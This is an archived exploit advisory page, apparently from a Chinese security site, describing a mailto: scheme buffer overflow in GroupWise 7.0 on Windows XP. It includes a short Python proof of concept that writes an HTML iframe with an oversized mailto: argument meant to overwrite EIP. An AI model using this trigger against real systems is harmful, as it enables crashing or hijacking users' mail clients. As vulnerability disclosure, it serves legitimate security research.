首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC
来源:www.vfocus.net 作者:Juan 发布时间:2008-04-29  

PRODUCT: GroupWise 7.0
OS: Windows Xp

The scheme "mailto" is vulnerable if one takes as default mail client to
GroupWise, the fault is to implement the scheme followed by an extensive
argument and this causes the buffer overflow. This brings the consequence that
can overwrite the EIP and is able to execute arbitrary code. The result with a
debbuger us what reveals.

Access violation when executing [41414141]

What power is that vulnerability to attach a html file which is included in an
iframe with the scheme badly formed runs only watch.

proof of concept

#!/usr/bin/python

a = "<iframe src='mailto:"
a += "A" * 1530
a += "\x61\x61\x61\x61"
a += "' width='320' height='300' scrolling='yes' name='content'></iframe>"

file = open("test.html", "w")
file.write(a)
file.close()

greetings!

Juan Pablo Lopez Yacubian


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows XP SP2 (win32k.sys)
·Joomla Component Webhosting (c
·VLC 0.8.6d httpd_FileCallBack
·Microsoft Works 7 WkImgSrv.dll
·HP Software Update (Hpufunctio
·HLDS WebMod 0.48 (rconpass) R
·DivX Player 6.7 SRT File Subti
·联众世界的游戏大厅主程序GLWorl
·又见0day! [FlashGet]-FG2CatchU
·Scout Portal Toolkit <= 1.4.0
·YouTube Clone Script (spages.p
·DeluxeBB <= 1.2 Multiple Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved